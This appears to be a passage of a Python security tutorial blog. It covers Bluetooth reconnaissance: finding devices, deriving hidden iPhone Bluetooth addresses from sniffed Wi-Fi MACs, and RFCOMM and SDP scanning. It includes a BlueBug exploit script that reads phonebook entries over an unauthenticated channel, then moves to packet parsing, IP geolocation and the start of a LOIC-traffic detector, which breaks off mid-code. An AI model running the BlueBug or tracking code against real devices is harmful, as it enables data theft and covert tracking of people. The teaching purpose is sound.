<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">dev_list</span> <span class="o">=</span> <span class="n">discover_devices</span><span class="p">()</span>
<span class="k">for</span> <span class="n">device</span> <span class="ow">in</span> <span class="n">dev_list</span><span class="p">:</span>
    <span class="n">name</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">lookup_name</span><span class="p">(</span><span class="n">device</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Bluetooth Device {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] MAC address: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">device</span><span class="p">)))</span>
</code></pre></div></div>

<p>Wrap the scan in an infinite loop to keep detecting new devices:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">already_found</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">find_devs</span><span class="p">():</span>
    <span class="n">found_devs</span> <span class="o">=</span> <span class="n">discover_devices</span><span class="p">(</span><span class="n">lookup_names</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">addr</span><span class="p">,</span> <span class="n">name</span> <span class="ow">in</span> <span class="n">found_devs</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">addr</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">already_found</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Found Bluetooth Device: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] MAC address: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr</span><span class="p">))</span>
            <span class="n">already_found</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
            
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">find_devs</span><span class="p">()</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
</code></pre></div></div>

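<h3 id="截取无限流量查找隐藏的蓝牙设备地址">Intercepting Wireless Traffic to Find (Hidden) Bluetooth Device Addresses</h3>

<p>On an iPhone, adding 1 to the MAC address of the wireless adapter gives the phone's Bluetooth MAC address. Because 802.11 does nothing at layer 2 to protect MAC addresses, they are easy to sniff, and the sniffed value can then be used to calculate the Bluetooth MAC address.</p>

<p>Next, set up a sniffer for the wireless adapter's MAC address. Note that we only keep MAC addresses whose first three octets match the target. Those first three octets are the OUI (Organizationally Unique Identifier), which identifies the device manufacturer; you can query the OUI database for more information.</p>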

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">wifi_print</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">iPhone_OUI</span> <span class="o">=</span> <span class="s">"d0:23:db"</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">):</span>
        <span class="n">wifi_mac</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
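        <span class="c1"># addr2 can be None on frames without a transmitter address</span>
        <span class="k">if</span> <span class="n">wifi_mac</span> <span class="ow">and</span> <span class="n">iPhone_OUI</span> <span class="o">==</span> <span class="n">wifi_mac</span><span class="p">[:</span><span class="mi">8</span><span class="p">]:</span>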
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected iPhone MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">wifi_mac</span><span class="p">))</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">wifi_print</span><span class="p">)</span>
</code></pre></div></div>
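
<p>The "add 1" step can be sketched as a small helper. This is only an illustration of the arithmetic described in this section: the name <code class="language-plaintext highlighter-rouge">wifi_to_bt_addr</code> is hypothetical, and the assumption that the Bluetooth address is exactly one greater than the Wi-Fi address comes from the text and may not hold for every device.</p>

```python
def wifi_to_bt_addr(wifi_mac):
    """Return the MAC address one greater than wifi_mac, colon-separated."""
    # Treat the six octets as one 48-bit integer, add 1, and wrap at 48 bits.
    value = (int(wifi_mac.replace(":", ""), 16) + 1) % (2 ** 48)
    digits = format(value, "012x")
    # Re-insert the colons between each pair of hex digits.
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


if __name__ == "__main__":
    print(wifi_to_bt_addr("d0:23:db:12:34:56"))
```

<p>Working on the whole address as an integer handles the carry when the last octet is <code class="language-plaintext highlighter-rouge">ff</code>, which a naive string edit of the final octet would get wrong.</p>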

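<p>With the MAC address in hand, an attacker can issue a device name inquiry to confirm that the device really exists. Even in "non-discoverable" mode, a Bluetooth device still responds to name inquiries.</p>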

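<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="n">lookup_name</span>

<span class="k">def</span> <span class="nf">check_bluetooth</span><span class="p">(</span><span class="n">bt_addr</span><span class="p">):</span>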
    <span class="n">bt_name</span> <span class="o">=</span> <span class="n">lookup_name</span><span class="p">(</span><span class="n">bt_addr</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">bt_name</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected Bluetooth Device: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">bt_name</span><span class="p">))</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Failed to Detect Bluetooth Device."</span><span class="p">)</span>
</code></pre></div></div>

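<h3 id="扫描蓝牙-rfcomm-信道">Scanning Bluetooth RFCOMM Channels</h3>

<p>At the CeBIT trade fair in 2004, Herfurt and Laurie demonstrated a Bluetooth vulnerability they called BlueBug (Herfurt, 2004). The vulnerability targets Bluetooth's RFCOMM transport protocol. RFCOMM emulates RS232 serial ports over the Bluetooth L2CAP protocol. In essence, it creates a Bluetooth connection to another device that mimics an ordinary serial cable, letting a user (on the other device) place phone calls, send SMS messages, read phonebook entries, forward calls, or connect to the Internet over Bluetooth.</p>

<p>Although RFCOMM can establish authenticated, encrypted connections, vendors sometimes omit this feature and allow unauthenticated users to connect to the device.</p>

<p>Next we write a scanner that finds devices allowing unauthenticated RFCOMM channel connections.</p>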

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">rf_comm_con</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
    <span class="n">sock</span> <span class="o">=</span> <span class="n">BluetoothSocket</span><span class="p">(</span><span class="n">RFCOMM</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">addr</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span> 
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] RFCOMM Port {} open"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">port</span><span class="p">))</span>
        <span class="n">sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] RFCOMM Port {} closed"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">port</span><span class="p">))</span>
<span class="k">for</span> <span class="n">port</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">30</span><span class="p">):</span>
    <span class="n">rf_comm_con</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
</code></pre></div></div>

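<p>This script finds open RFCOMM ports but cannot tell which services they provide. For that, we need the Bluetooth Service Discovery Protocol.</p>

<h3 id="使用蓝牙服务发现协议">Using the Bluetooth Service Discovery Protocol</h3>

<p>The Bluetooth Service Discovery Protocol (SDP) provides a simple way to describe and enumerate the types of Bluetooth profiles and services a device offers. A device's SDP profile describes the services running on each Bluetooth protocol and port.</p>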

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">sdp_browse</span><span class="p">(</span><span class="n">addr</span><span class="p">):</span>
    <span class="n">services</span> <span class="o">=</span> <span class="n">find_service</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">addr</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">service</span> <span class="ow">in</span> <span class="n">services</span><span class="p">:</span>
        <span class="n">name</span> <span class="o">=</span> <span class="n">service</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span>
        <span class="n">proto</span> <span class="o">=</span> <span class="n">service</span><span class="p">[</span><span class="s">"protocol"</span><span class="p">]</span>
        <span class="n">port</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">service</span><span class="p">[</span><span class="s">"port"</span><span class="p">])</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found {} on {}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">proto</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="n">sdp_browse</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">)</span>
</code></pre></div></div>

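<p>Calling <code class="language-plaintext highlighter-rouge">find_service()</code> returns an array of records, one for each service on the target Bluetooth device. Each record contains the host, name, description, provider, protocol, port, service classes, profiles, and service ID.</p>

<p>The Object Exchange (OBEX) service lets us upload (push) and download (pull) files on a system anonymously, much like anonymous FTP.</p>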
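
<p>Once the service records are available, picking out the OBEX entries is a simple filter. The sketch below assumes each record is a dictionary with <code class="language-plaintext highlighter-rouge">"name"</code>, <code class="language-plaintext highlighter-rouge">"protocol"</code>, and <code class="language-plaintext highlighter-rouge">"port"</code> keys, as used in the script above. The helper name <code class="language-plaintext highlighter-rouge">find_obex_services</code> and the sample records are hypothetical.</p>

```python
def find_obex_services(records):
    """Return (name, protocol, port) for records whose name mentions OBEX."""
    matches = []
    for record in records:
        # A record's name may be missing or None, so fall back to "".
        name = record.get("name") or ""
        if "obex" in name.lower():
            matches.append((name, record.get("protocol"), record.get("port")))
    return matches


if __name__ == "__main__":
    # Hypothetical records shaped like the ones printed by sdp_browse().
    sample = [
        {"name": "OBEX Object Push", "protocol": "RFCOMM", "port": 9},
        {"name": "Headset Gateway", "protocol": "RFCOMM", "port": 3},
        {"name": None, "protocol": "L2CAP", "port": 25},
    ]
    for name, proto, port in find_obex_services(sample):
        print("[+] {} on {}:{}".format(name, proto, port))
```

<p>Matching on the service name is only a heuristic; a stricter check would compare the record's service class identifiers instead.</p>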

<h3 id="用-python-obexftp-控制打印机">Controlling a Printer with Python ObexFTP</h3>

<p>Use ObexFTP to connect to the printer and upload an image file:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">obexftp</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">bt_printer</span> <span class="o">=</span> <span class="n">obexftp</span><span class="p">.</span><span class="n">client</span><span class="p">(</span><span class="n">obexftp</span><span class="p">.</span><span class="n">BLUETOOTH</span><span class="p">)</span>
    <span class="n">bt_printer</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
    <span class="n">bt_printer</span><span class="p">.</span><span class="n">put_file</span><span class="p">(</span><span class="s">"/tmp/ninja.jpg"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printed Ninja Image."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Failed to print Ninja Image."</span><span class="p">)</span>
</code></pre></div></div>

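<h3 id="用-python-利用手机中的-bluebug-漏洞">Exploiting the BlueBug Vulnerability in Phones with Python</h3>

<p>BlueBug establishes an insecure connection to the phone that requires no authentication, then uses it to steal information from the phone or send it commands directly. The attack controls the device remotely by sending AT commands over an RFCOMM channel, allowing the attacker to read and send SMS messages, gather personal information, or force the phone to dial a number.</p>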
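
<p>The phonebook read command <code class="language-plaintext highlighter-rouge">AT+CPBR</code> used in this section replies with text lines of the form <code class="language-plaintext highlighter-rouge">+CPBR: index,"number",type,"name"</code>. The following sketch parses such replies into dictionaries. It assumes the reply has already been decoded to text and that the phone follows this layout; the helper name <code class="language-plaintext highlighter-rouge">parse_cpbr</code> and the sample reply are hypothetical.</p>

```python
import re

# One phonebook entry: +CPBR: index,"number",type,"name"
CPBR_RE = re.compile(r'\+CPBR:\s*(\d+),"([^"]*)",(\d+),"([^"]*)"')


def parse_cpbr(response):
    """Extract phonebook entries from the text of an AT+CPBR reply."""
    entries = []
    for index, number, number_type, name in CPBR_RE.findall(response):
        entries.append({
            "index": int(index),
            "number": number,
            "type": int(number_type),  # numeric address-type code from the reply
            "name": name,
        })
    return entries


if __name__ == "__main__":
    # Hypothetical reply text; real devices may vary in spacing and line ends.
    reply = '\r\n+CPBR: 1,"+15550100",145,"Alice"\r\n\r\nOK\r\n'
    for entry in parse_cpbr(reply):
        print("[+] {index}: {name} {number}".format(**entry))
```

<p>Lines that do not match the pattern, such as the trailing <code class="language-plaintext highlighter-rouge">OK</code>, are ignored rather than raising an error.</p>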

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">bluetooth</span>
<span class="n">target_phone</span> <span class="o">=</span> <span class="s">"AA:BB:CC:DD:EE:FF"</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">17</span>
<span class="n">phone_sock</span> <span class="o">=</span> <span class="n">bluetooth</span><span class="p">.</span><span class="n">BluetoothSocket</span><span class="p">(</span><span class="n">bluetooth</span><span class="p">.</span><span class="n">RFCOMM</span><span class="p">)</span>
<span class="n">phone_sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target_phone</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="k">for</span> <span class="n">contact</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">):</span>
    <span class="n">at_cmd</span> <span class="o">=</span> <span class="s">"AT+CPBR={}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">contact</span><span class="p">)</span>
    <span class="n">phone_sock</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">at_cmd</span><span class="p">)</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">phone_sock</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">contact</span><span class="p">,</span> <span class="n">result</span><span class="p">))</span>
<span class="n">phone_sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="wireless network" /><summary type="html"><![CDATA[用 Python 进行无线网络攻击]]></summary></entry><entry><title type="html">Analyzing Network Traffic with Python</title><link href="https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python/" rel="alternate" type="text/html" title="Analyzing Network Traffic with Python" /><published>2024-09-10T00:00:00+00:00</published><updated>2024-09-10T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python/"><![CDATA[<h2 id="用-python-分析网络流量">用 Python 分析网络流量</h2>

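<h2 id="ip-流量将何去何从用-python-回答">Where Is Your IP Traffic Headed? A Python Answer</h2>

<p>To associate an Internet Protocol (IP) address with a physical location, we can use GeoLiteCity, a freely available database from MaxMind. With this database, an IP address can be mapped to its country, postal code, and approximate latitude and longitude.</p>

<h3 id="使用-pygeoip-关联-ip-地址和物理位置">Using PyGeoIP to Correlate IP Addresses with Physical Locations</h3>

<p>Jennifer Ennis wrote pygeoip, a pure-Python library for querying the GeoLiteCity database. A lookup returns a record containing the city, region name (<code class="language-plaintext highlighter-rouge">region_name</code>), postal code (<code class="language-plaintext highlighter-rouge">postal_code</code>), country name (<code class="language-plaintext highlighter-rouge">country_name</code>), latitude and longitude, and other identifying information.</p>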

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pygeoip</span>
<span class="n">gi</span> <span class="o">=</span> <span class="n">pygeoip</span><span class="p">.</span><span class="n">GeoIP</span><span class="p">(</span><span class="s">"/opt/GetIP/Geo.dat"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">print_record</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">rec</span> <span class="o">=</span> <span class="n">gi</span><span class="p">.</span><span class="n">record_by_name</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
    <span class="n">city</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"city"</span><span class="p">]</span>
    <span class="n">region</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"region_name"</span><span class="p">]</span>
    <span class="n">country</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"country_name"</span><span class="p">]</span>
    <span class="nb">long</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"longitude"</span><span class="p">]</span>
    <span class="n">lat</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"latitude"</span><span class="p">]</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Target: {} Geo-located."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}, {}, {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">city</span><span class="p">,</span> <span class="n">region</span><span class="p">,</span> <span class="n">country</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Latitude: {}, Longitude: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lat</span><span class="p">,</span> <span class="nb">long</span><span class="p">))</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"173.255.226.98"</span>
<span class="n">print_record</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
</code></pre></div></div>

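<h3 id="使用-dpkt-解析包">Parsing Packets with Dpkt</h3>

<p>Dpkt lets us step through the packets in a capture file one at a time and examine each protocol layer. Live traffic can also be analyzed using pypcap.</p>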

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="k">def</span> <span class="nf">print_pcap</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Src: {} --&gt; Dst: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">))</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
        
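<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="c1"># dpkt expects bytes, so open the capture file in binary mode</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"geotest.pcap"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">pcap</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">pcap</span><span class="p">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
        <span class="n">print_pcap</span><span class="p">(</span><span class="n">pcap</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>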
</code></pre></div></div>
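
<p>To make clearer what the Ethernet and IP decoding involves, here is a rough standard-library sketch that pulls the source and destination addresses out of a raw Ethernet frame by hand. It is not how Dpkt is implemented; it assumes an untagged Ethernet II frame carrying IPv4, and the names <code class="language-plaintext highlighter-rouge">parse_ipv4_addrs</code> and <code class="language-plaintext highlighter-rouge">build_sample_frame</code> are hypothetical.</p>

```python
import socket
import struct

ETH_HEADER_LEN = 14      # destination MAC (6) + source MAC (6) + EtherType (2)
ETHERTYPE_IPV4 = 0x0800


def parse_ipv4_addrs(frame):
    """Return (src, dst) as dotted-quad strings, or None if not IPv4."""
    if ETH_HEADER_LEN + 20 > len(frame):
        return None  # too short to hold Ethernet plus a minimal IPv4 header
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != ETHERTYPE_IPV4:
        return None
    ip_header = frame[ETH_HEADER_LEN:ETH_HEADER_LEN + 20]
    # Source and destination addresses sit at bytes 12..19 of the IPv4 header.
    src, dst = struct.unpack("!4s4s", ip_header[12:20])
    return socket.inet_ntoa(src), socket.inet_ntoa(dst)


def build_sample_frame(src, dst):
    """Build a minimal Ethernet + IPv4 header pair for demonstration only."""
    eth = b"\x00" * 6 + b"\x11" * 6 + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20, 0, 0, 64, 6, 0,  # version/IHL, TOS, length, id, frag, TTL, proto, checksum
        socket.inet_aton(src), socket.inet_aton(dst),
    )
    return eth + ip


if __name__ == "__main__":
    frame = build_sample_frame("192.168.1.10", "173.255.226.98")
    print("[+] Src: {} --> Dst: {}".format(*parse_ipv4_addrs(frame)))
```

<p>Returning <code class="language-plaintext highlighter-rouge">None</code> for non-IPv4 frames plays the same role as the <code class="language-plaintext highlighter-rouge">try</code>/<code class="language-plaintext highlighter-rouge">except</code> in the Dpkt version, which silently skips packets it cannot decode.</p>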

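<h3 id="使用-python-画谷歌地图">Building a Google Map with Python</h3>

<p>Google Earth displays a virtual globe, maps, and geographic information in a proprietary viewer. Although the viewer is proprietary, Google Earth makes it easy to plot specific locations or tracks on the globe. By creating a text file with the .kml extension, a user can mark many locations on Google Earth. KML is an XML structure with a specific schema.</p>

<p>Write a function <code class="language-plaintext highlighter-rouge">ret_kml</code> that takes an IP address and returns the KML structure for the physical location of that address:</p>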

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">ret_kml</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
    <span class="n">rec</span> <span class="o">=</span> <span class="n">gi</span><span class="p">.</span><span class="n">record_by_name</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">longitude</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"longitude"</span><span class="p">]</span>
        <span class="n">latitude</span><span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"latitude"</span><span class="p">]</span>
        <span class="n">kml</span> <span class="o">=</span> <span class="p">(</span>
            <span class="s">"&lt;Placemark&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;name&gt;%s&lt;/name&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;Point&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;coordinates&gt;%6f,%6f&lt;/coordinates&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;/Point&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;/Placemark&gt;</span><span class="se">\n</span><span class="s">"</span>
        <span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">longitude</span><span class="p">,</span> <span class="n">latitude</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">kml</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">""</span>
</code></pre></div></div>
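
<p>A single placemark is not yet a complete KML file; the placemarks need to sit inside a document under a <code class="language-plaintext highlighter-rouge">kml</code> root element. The sketch below shows one way to assemble such a file. It swaps the string formatting used above for the standard library's <code class="language-plaintext highlighter-rouge">xml.etree.ElementTree</code>, takes already-resolved coordinates instead of calling pygeoip, and uses a hypothetical helper name, <code class="language-plaintext highlighter-rouge">build_kml_document</code>.</p>

```python
import xml.etree.ElementTree as ET

KML_NS = "http://www.opengis.net/kml/2.2"


def build_kml_document(points):
    """Return a KML string with one Placemark per (name, lon, lat) tuple."""
    kml = ET.Element("kml", xmlns=KML_NS)
    document = ET.SubElement(kml, "Document")
    for name, longitude, latitude in points:
        placemark = ET.SubElement(document, "Placemark")
        ET.SubElement(placemark, "name").text = name
        point = ET.SubElement(placemark, "Point")
        # KML lists coordinates as longitude,latitude (in that order).
        coords = "{:.6f},{:.6f}".format(longitude, latitude)
        ET.SubElement(point, "coordinates").text = coords
    return ET.tostring(kml, encoding="unicode")


if __name__ == "__main__":
    # Hypothetical coordinates for the sample address used in this post.
    print(build_kml_document([("173.255.226.98", -122.3933, 37.7697)]))
```

<p>Building the tree with ElementTree also escapes any special characters in the placemark name, which plain string formatting would not do.</p>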

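<p>You may want to use different icons for different types of network traffic, for example distinguishing traffic by source and destination TCP port. See Google's KML documentation for details.</p>

<h2 id="匿名者-真能匿名吗分析-loic-流量">Is "Anonymous" Really Anonymous? Analyzing LOIC Traffic</h2>

<p>LOIC (Low Orbit Ion Cannon) is a distributed denial-of-service toolkit.</p>

<p>LOIC floods a target with large volumes of UDP and TCP traffic to carry out a denial-of-service attack.</p>

<p>LOIC offers two modes of operation. In the first, the user enters the target's address. In the second, called HIVEMIND, the user connects LOIC to an IRC server, where a user can nominate a target that every IRC user connected to the server then attacks automatically.</p>

<h3 id="使用-dkpt-发现下载-loic-的行为">Using Dpkt to Find LOIC Downloads</h3>

<p>Write a Python script that parses HTTP traffic and checks for HTTP GET requests that fetch the zipped LOIC binary. To do this, we again use Dug Song's Dpkt library.</p>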

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>

<span class="k">def</span> <span class="nf">find_download</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">http</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">http</span><span class="p">.</span><span class="n">Request</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">http</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">"GET"</span><span class="p">:</span>
